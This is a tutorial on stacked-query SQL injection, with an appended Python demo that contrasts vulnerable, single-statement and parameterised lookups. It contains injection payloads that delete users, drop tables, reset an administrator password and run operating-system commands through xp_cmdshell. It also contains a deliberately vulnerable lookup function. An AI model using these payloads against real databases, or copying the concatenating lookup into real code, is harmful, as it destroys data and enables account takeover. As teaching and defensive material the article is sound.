Stack based SQL Injection

Definition:
In SQL a semicolon (;) terminates a statement, and another statement may follow it in the same string. If an application concatenates user input directly into a query, and the database driver is willing to execute more than one statement per call, an attacker can terminate the developer's statement and append their own. Such queries are called stacked queries, and the attack is called stacked-query (or stack-based) SQL injection. Whether it works depends on the DBMS and the client API as much as on the application code: Microsoft SQL Server accepts stacked statements through its common drivers, PostgreSQL does through libpq-based drivers such as psycopg2, MySQL only when the client enables multi-statement support (mysqli_multi_query, PDO with emulated prepares), while some APIs (Python's sqlite3 execute(), PHP's legacy mysql_query()) refuse more than one statement per call and Oracle's drivers generally do not stack plain statements at all.
Stacked-query injection is the most severe form of SQL injection because the attacker is no longer limited to the verb of the original query: a SELECT can be followed by INSERT, UPDATE or DELETE, by DDL such as DROP, or, on SQL Server, by stored procedures that run operating-system commands. Destructive statements such as DROP TABLE remove data permanently (short of restoring a backup), which amounts to a permanent denial of service.
Example and Exploitation: 
Take a lookup that returns product_name for a given product_id:

SELECT product_name FROM Products WHERE product_id = 'XYZ'

If the product_id parameter is vulnerable to stacked-query injection, the attacker supplies a value such as XYZ'; DELETE FROM users-- : the single quote closes the string literal, the semicolon ends the developer's statement, and the trailing comment marker (--) swallows the closing quote the application appends. The examples below show the statements the database ends up executing, with that trailing comment omitted for readability:

SELECT product_name FROM Products WHERE product_id = 'XYZ'; DELETE FROM users

Here the second statement deletes every row of the users table, while the first still returns the product name, so the response looks normal to the application. More examples of what can be stacked:
Delete data: 

SELECT product_name FROM Products WHERE product_id = 'XYZ'; DELETE FROM products

Delete table:

SELECT product_name FROM Products WHERE product_id = 'XYZ'; DROP TABLE users

Modify data (here resetting the administrator's password; as written this only works if the application stores passwords in plaintext, otherwise the attacker must write a hash the application will accept):

SELECT product_name FROM Products WHERE product_id = 'XYZ'; UPDATE users SET password='pwd' WHERE username='administrator'

Run operating-system commands (Microsoft SQL Server only): xp_cmdshell executes the command as the SQL Server service account. It is disabled by default since SQL Server 2005 and can only be executed, or re-enabled through sp_configure, by a sufficiently privileged login (typically sysadmin), so this step depends on the application's database login being that privileged:

SELECT product_name FROM Products WHERE product_id = 'XYZ'; exec master..xp_cmdshell 'DEL important_file.txt'
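As an added example (not code from the original article), the following Python program builds the vulnerable product lookup above against an in-memory SQLite database, emulates a driver that executes stacked statements, shows what happens when the same concatenation bug runs through a single-statement API, and shows the parameterised fix. The schema, sample rows and function names are constructed for the demo; Python's sqlite3 execute() accepts only one statement per call, so a small helper stands in for a multi-statement driver.

```python
"""Stacked-query injection in an application, vulnerable and fixed.

Added example, not code from the original article.  It uses Python's
sqlite3 module with an in-memory database and a constructed schema
(Products / users, matching the article's statements).  Assumptions are
marked in the comments.
"""
import sqlite3

# The article's attack, as the attacker would type it into product_id:
# the quote closes the literal, the semicolon ends the SELECT, and the
# trailing "--" comments out the closing quote the application appends.
PAYLOAD = "XYZ'; DELETE FROM users--"


def make_db() -> sqlite3.Connection:
    """Constructed sample data (assumption: the article gives no schema)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE Products (product_id TEXT PRIMARY KEY, product_name TEXT);
        CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT);
        INSERT INTO Products VALUES ('XYZ', 'Widget'), ('ABC', 'Gadget');
        INSERT INTO users VALUES ('administrator', 's3cret'), ('alice', 'hunter2');
        """
    )
    return conn


def count_users(conn: sqlite3.Connection) -> int:
    return conn.execute("SELECT COUNT(*) FROM users").fetchone()[0]


def run_multi_statement(conn: sqlite3.Connection, sql: str) -> list:
    """Stand-in for a driver that executes every statement in the string
    (SQL Server drivers, psycopg2, MySQL with CLIENT_MULTI_STATEMENTS).
    sqlite3's execute() accepts only one statement, so this helper splits
    the string itself.  The naive split on ';' is adequate for the payload
    above; real drivers tokenise properly.  Returns the first result set,
    which is what the application shows the user.
    """
    first_rows = None
    for stmt in sql.split(";"):
        if not stmt.strip():
            continue
        rows = conn.execute(stmt).fetchall()
        if first_rows is None:
            first_rows = rows
    conn.commit()
    return first_rows or []


def lookup_vulnerable(conn: sqlite3.Connection, product_id: str) -> list:
    """The article's bug: user input concatenated into the SQL text."""
    sql = f"SELECT product_name FROM Products WHERE product_id = '{product_id}'"
    return run_multi_statement(conn, sql)


def lookup_single_statement_api(conn: sqlite3.Connection, product_id: str):
    """Same concatenation bug, but through an API that refuses more than one
    statement per call (sqlite3.Connection.execute).  Stacking fails, yet the
    query is still injectable (UNION, boolean and time-based attacks all work),
    so this is a driver property, not a fix.  Returns rows, or the error text.
    """
    sql = f"SELECT product_name FROM Products WHERE product_id = '{product_id}'"
    try:
        return conn.execute(sql).fetchall()
    except (sqlite3.ProgrammingError, sqlite3.Warning) as exc:
        # "You can only execute one statement at a time." (raised as Warning
        # on old Python versions, ProgrammingError on current ones)
        return str(exc)


def lookup_hardened(conn: sqlite3.Connection, product_id: str) -> list:
    """The fix: a parameterised query.  product_id is bound as data, so
    quotes and semicolons in it are never parsed as SQL."""
    return conn.execute(
        "SELECT product_name FROM Products WHERE product_id = ?", (product_id,)
    ).fetchall()


if __name__ == "__main__":
    conn = make_db()
    print("users before:", count_users(conn))
    print("vulnerable lookup returned:", lookup_vulnerable(conn, PAYLOAD))
    print("users after vulnerable lookup:", count_users(conn))

    conn = make_db()
    print("single-statement API:", lookup_single_statement_api(conn, PAYLOAD))
    print("hardened lookup returned:", lookup_hardened(conn, PAYLOAD))
    print("users after hardened lookup:", count_users(conn))
```

Running it shows the vulnerable path returning the product name as usual while the users table is emptied behind the scenes, the single-statement API rejecting the stacked payload without making the query safe, and the parameterised lookup treating the whole payload as a product id that matches nothing. The same split between "driver allows stacking" and "application binds parameters" is what decides whether the DELETE, DROP, UPDATE and xp_cmdshell examples above are reachable on a real system.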
